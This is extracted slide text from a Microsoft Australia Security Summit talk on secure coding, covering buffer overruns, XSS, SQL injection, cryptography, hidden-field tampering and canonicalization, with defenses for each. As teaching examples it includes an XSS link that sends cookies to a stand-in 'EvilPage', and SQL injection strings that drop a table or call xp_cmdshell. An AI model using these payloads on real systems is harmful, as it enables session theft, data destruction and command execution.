microsoft australia security summit managing risk: application development principles and best...

Microsoft Australia Security Summit

Managing Risk: Managing Risk:

Application Development Application Development Principles and Best PracticesPrinciples and Best Practices

Dave GloverMicrosoft Pty Ltdhttp://blogs.msdn.com/dglover

Microsoft Australia Security Summit

The Gartner Group states: "Today over 70% of attacks against a

company's Web site or Web application come at the 'Application Layer' not the Network or System layer."

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Buffer OverrunsOccurs when data exceeds the expected size and overwrites other values

Exists primarily in unmanaged C/C++ code

Includes four types: Stack-based

Heap overruns

V-table and function pointer overwrites

Exception handler overwrites

Can be exploited by worms and can result in:

Access Violation (Denial of Service)

Instability

Code Injection

Microsoft Australia Security Summit

How Stack-Based Buffer Overruns Work

#include <string.h>

void flawed(char * str) {char buffer[10]; strcpy(buffer, str);

}

void main() { flawed("This string is too long");

}

Microsoft Australia Security Summit

Defending Against Buffer Overruns

Deprecated and should be avoided…Strcpy, strncpy, CopyMemory MultiByteToWideChar,…

Use strsafe.h for safer buffer handlingUse the /GS compile option in Visual C++ .NETCheck all array indexesUse recognized file-path processing methods, such as splitpath (C runtime)Use managed code

But pay attention to PInvoke and COM Interop

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Arithmetic Errors

Occur when the limitations of a variable are exceeded

Lead to serious runtime issues

Are often overlooked and underestimated

Include:Overflow – value too large for data type

Underflow – value too small for data type

Microsoft Australia Security Summit

Arithmetic Overflow- CalEngine- Purchase.aspx- GoodPurchase.aspx

Microsoft Australia Security Summit

Defending Against Arithmetic Errors

Understand the Limitations

Unit Test Boundary Conditions

Consider limitations of data types

Consider writing safe, reusable functions

Consider using a safe template class (if coding in C++)

Use Languages that support overflow checking – VB.NET and C# !!

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Cross-Site Scripting

Malicious script is sent to a Web application as input.

Echoed back to a user’s browser, where it is executed

Targets your users, your application is the vehicle

Attacks are via carefully crafted hyperlinks

Allows hackers to:Execute malicious script in a client’s Web browser

Insert <script>, <object>, <applet>, <form>, and <embed> tags

Steal Web session information and cookies (inc Authentication)

Access the client computer resources

Microsoft Australia Security Summit

How Cross-Site Scripting Works

<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=‘ + document.cookie);</script>">…</a>

Query string contains embedded JavaScript thatredirects to the hacker’s page and transmits anycookies issued by Search.aspx in a query string

URL points to the site that the hacker wants to attack

Microsoft Australia Security Summit

What Is One-Click Attack

Site offers persistent sign-in option (cookies)

Victim user navigates to (or opens) an HTML page – perhaps a “once in a lifetime offer”

One or more actions are carried out using the trustof the victim user which is completely unsuspectingto that user

Microsoft Australia Security Summit

Cross Site Script Attacks- Search.aspx- Review.aspx- AntiXSS Library- Secure Controls- GoodSearch.aspx- Validation Controls- Secure Frames- One Click Attack

Microsoft Australia Security Summit

Defending Against Cross-Site Scripting Attacks

Do notTrust user input

Echo client-supplied data without encoding

Store secret information in cookies

DoTake advantage of ASP.NET’s validateRequest

Take advantage of ASP.NET’s ViewStateUserKey

Consider AntiXSS for data encoding

Use the HttpOnly cookie option

Use the <frame> security attribute

Implement Secure Custom Controls

Microsoft Australia Security Summit

Defending Against XSSInput validation – First line of defense

Output encoding

Platform features

Server.HtmlEncode() Ok: principle of exclusions or black-listing

Use Anti-XSSBetter: principle of inclusions or white-listing

Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding:

Bad code:

someLabel.Text = "Results for " + searchstring + ":";

Mitigation using Anti-XSS:

someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";

Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding:

Bad code:

someLabel.Text = "Results for " + searchstring + ":";

Mitigation using Anti-XSS:

someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";

Microsoft Australia Security Summit

Defending Against One-Click Attack

Browser’s cross-frame security limits this to a “write-only” attack

Concept for defense: Require a data element in the request which the attacker can’t supply

Check Referrer field

In .Net 1.1 use ViewStateUserKey

override protected void OnInit(EventArgs e){// ...

ViewStateUserKey = User.Identity.Name;// ...}

override protected void OnInit(EventArgs e){// ...

ViewStateUserKey = User.Identity.Name;// ...}

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

SQL Injection

Adds SQL statements to user input to:Probe databases, execute multiple SQL statements

Bypass authorization

Call built-in stored procedures

Exploits applications that don’t validate input

Input from <form> fields, query strings, cookies

Microsoft Australia Security Summit

How SQL Injection Works

SELECT COUNT (*) FROM UsersWHERE UserName=‘Jeff’AND Password=‘imbatman’

SELECT COUNT (*) FROM UsersWHERE UserName=‘’ or 1=1--AND Password=‘’

Model Query

Malicious Query

"or 1=1" matches everyrecord in the table

"--" comments out theremainder of the query

Microsoft Australia Security Summit

Examples Of SQL Injection

If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following

ALFKI1001

ALFKI1001' or 1=1 --

ALFKI1001'; DROP TABLE OrderDetail --

ALFKI1001'; exec xp_cmdshell('fdisk.exe') --

sqlString = Format.String(select count (*) from customers where username='{0}' and password='{1}‘, userName, password));

sqlString = Format.String(select count (*) from customers where username='{0}' and password='{1}‘, userName, password));

Microsoft Australia Security Summit

SQL Injection Attack- Login Attack- Search Page Attack- SQL Cmd Shell Attack

Microsoft Australia Security Summit

Defending Against SQL Injection

Code against SQL Injection AttacksSanitize all inputDon’t use Dynamic SQL commandsUse Secured Stored Procedures or Parameterized Commands

Run with least privilegeNever execute as “sa”Restrict access to built-in stored procedures

Store connection strings securelyIntegrated Security BetterEncrypt Web.Config Connections SectionDPAPI or Configuration Application Block

Do not echo database errors (fail intelligently)Apply administrative protections to SQL Server

http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Cryptography Weaknesses

Inappropriate use of algorithmsCreating your own

Using weak ones

Incorrect application

Failure to keep keys secureInsecure storage

Extensive duration of use

The human factorAccidental release of private keys

Key

Plaintext

Ciphertext

Algorithm

I need three of the above to decrypt

your data!

I need three of the above to decrypt

your data!

Microsoft Australia Security Summit

Defending Against Cryptography Weaknesses

Recycle keys periodically

Use ACLs to restrict access to keys

Store keys on an external device

Use larger keys to provide increased security

Use DPAPI to simplify key management, if possible

Do not implement your own cryptographic routines

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Hidden-Field Tampering

Exploits applications that persist data between requests by round-tripping it in hidden <input> fields

The techniqueLook for <input type="hidden" … > tags

Submit bogus requests with modified value attributes to spoof a Web server

Microsoft Australia Security Summit

How Hidden-Field Tampering Works

<input type="hidden" id="price" value="10000.00">

Page contains this…

Postback data should contain this…price="10000.00"

Instead it contains this…price="1.00"

Microsoft Australia Security Summit

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Microsoft Australia Security Summit

Canonicalization Issues

There is usually more than one way to name something

Alternate representations exist for:File names

URLs

Devices (such as printers)

Hackers may exploit code that makes decisions based on file names or URLs

Microsoft Australia Security Summit

Canonicalization IssuesExample 1: File Names

1 MyLongFile.txt

2 MyLongFile.txt.

3 MyLong~1.txt

4 MyLongFile.txt::$DATA

Microsoft Australia Security Summit

Defending Against Canonicalization Issues

Use file-system security to restrict access to private data

Never make a decision based on a name

Disable the IIS Parent Paths setting

Encrypt Web.Config Sections

Microsoft Australia Security Summit

Encrypting Web.config sectionsaspnet_regiis -pc "SampleKeys" -exp aspnet_regiis -pa "SampleKeys" “domain\acct”aspnet_regiis -pef connectionStrings .aspnet_regiis -pdf connectionStrings .Web.config<configProtectedData defaultProvider="SampleProvider"> <providers> <add name="SampleProvider"

type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL“ keyContainerName="SampleKeys" useMachineContainer="true" />

</providers> </configProtectedData>

Microsoft Australia Security Summit

Traversal Attacks- PathTraversal.htm- ViewImage.aspx- GoodProducts.aspx- Web.Config Encryption

Microsoft Australia Security Summit

Next Steps

Stay informed about securityMicrosoft Developers Network Security Center

http://msdn.microsoft.com/security/

Microsoft Security Guidance

http://www.microsoft.com/security/guidance/

Get additional security trainingFind online and in-person training seminars:

http://www.microsoft.com/seminar/events/security/

Read the book: Writing Secure CodeMichael Howard and David LeBlanc

ISBN: 0-7356-1722-8

Microsoft Australia Security Summit

Defending Against the Others

Improving Web Application SecurityThreats and Countermeasures

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp

Microsoft Australia Security Summit

Security e-forum site www.microsoft.com.au/eforum

View On demand web casts of all presentations from this event (tell your work colleagues!)Online Live chats

Have a live chat with the Microsoft security experts you’ll see today. Check the e-forum site for the Live Chat schedule.

Plus lots more…

Evaluation forms - we value your feedback! Need help with your business’ security?

Q7 - register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your Security challenges

Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360

Security seminar follow up…

Microsoft Australia Security Summit